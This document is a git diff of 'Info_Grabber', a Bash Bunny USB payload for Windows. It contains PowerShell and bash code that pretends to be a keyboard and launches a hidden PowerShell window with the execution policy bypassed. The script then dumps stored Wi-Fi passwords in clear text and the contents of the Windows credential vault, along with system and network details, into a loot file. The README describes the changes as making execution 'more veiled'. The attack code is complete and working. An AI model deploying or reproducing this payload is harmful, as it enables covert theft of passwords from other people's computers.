# Simen Kjeserud (Original creator), Gachnang
# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)
#Get info about pc
# Get IP / Nework Info
try
{
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
@ -21,6 +22,7 @@ $IsDHCPEnabled = $true
[string[]]$computerMAC =$Network.MACAddress
}
#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement
@ -47,11 +49,10 @@ if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").
$RDP = "RDP is NOT enabled"
}
# Get network interfaces
#| where { $_.ipaddress -notlike $null }
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get wifi SSID and password
# Get wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
@ -82,8 +83,7 @@ $luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Na
# process first
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
# get listeners / ActiveTcpConnections
#[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections() | Format-Table -AutoSize
# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
$listenerItem = $_
@ -113,29 +113,7 @@ $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $nu
# videocard
$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
#Get installed passwords
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList
for($i = 0; $i -lt $profileRows.Count; $i++){
$profileName = ($profileRows[$i] -split ":")[-1].Trim()
$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
if($passwordSearchResult){
$profilePw = ($passwordSearchResult -split ":")[-1].Trim()
} else {
$profilePw = ''
}
$networkObject = New-Object -TypeName psobject -Property @{
ProfileName = $profileName
SSID = $profileSSID
Password = $profilePw
}
$profileNames.Add($networkObject)
}
$profileNames.Add($networkObject)
#Get stored passwords
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
@ -180,7 +158,7 @@ $computerSystem.Name
"Network: "
"=================================================================="
"Computers MAC address: " + $computerMAC
"Computers IP address: " + $computerIP.ipaddress[0]
"Computers IP address: " + $computerIP.ipaddress[0]
"Public IP address: " + $computerPubIP
"RDP: " + $RDP
""
@ -210,5 +188,3 @@ $computerSystem.Name
"Windows/user passwords"
"=================================================================="
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize


@ -1,43 +1,21 @@
#!/bin/bash
#
# Title: Info_Grabber
# Author: Simen Kjeserud
# Version: 1.0
# Target: Windows
# Creds: Hak5Darren for inspiration
# Title: Info_Grabber
# Original Author: Simen Kjeserud
# V2.0 Author: DannyK999
# Version: 2.0
# Target: Windows
# Creds: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
#
# Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Check swith copied from bunny_helper
check_switch() {
switch1=`cat /sys/class/gpio_sw/PA8/data`
switch2=`cat /sys/class/gpio_sw/PL4/data`
switch3=`cat /sys/class/gpio_sw/PL3/data`
if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch1"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
SWITCH_POSITION="switch2"
elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
SWITCH_POSITION="switch3"
else
SWITCH_POSITION="invalid"
fi
}
check_switch
# Set your language here
QUACK SET_LANGUAGE no
QUACK GUI r
QUACK DELAY 200
# Open run and run the run.ps1 script in the Bashbunny
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
QUACK ENTER
LED G
#Green means good to go
LED ATTACK
# Run the run.ps1 script in the BashBunny
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH


@ -1,10 +1,13 @@
# InfoGrabber for the Bunnys
# Info Grabber for the BashBunny
Author: Simen Kjeserud
Original Author Simen Kjeserud
Version: Version 1.0
V2.0 Author: DannyK999
Version: Version 2.0
Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration
Credit: Hak5Darren for inspiration
((`\
___ \\ '--._
@ -12,13 +15,15 @@ Credit: Hak5Darren for inspiration
/ \ '. __.'
_| /_ \ \_\_
{_\______\-'\__\_\
Check out my website:
Check out Simen's website:
aknemis.com
## Description
Gather a lot of information about the computer and place it in a text file in loot/info/.
Updates include code/output cleanup, faster runtime, and more veiled execution.
Here you can se what it will look like:
@ -64,10 +69,6 @@ Here you can se what it will look like:
Made for windows. The only thing you will need to change is the Ducky language so it matches the keyboard input.
## Requirements
DuckyTools for the BashBunny, and you need to change to the language the computer uses.
## STATUS
| LED | Status |


@ -1,12 +0,0 @@
LED R B 100
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go


@ -1,12 +1,7 @@
LED R B 100
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
DUCKY_LANG gb
LED B
LED ATTACK
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED FINISH

Some files were not shown because too many files have changed in this diff Show More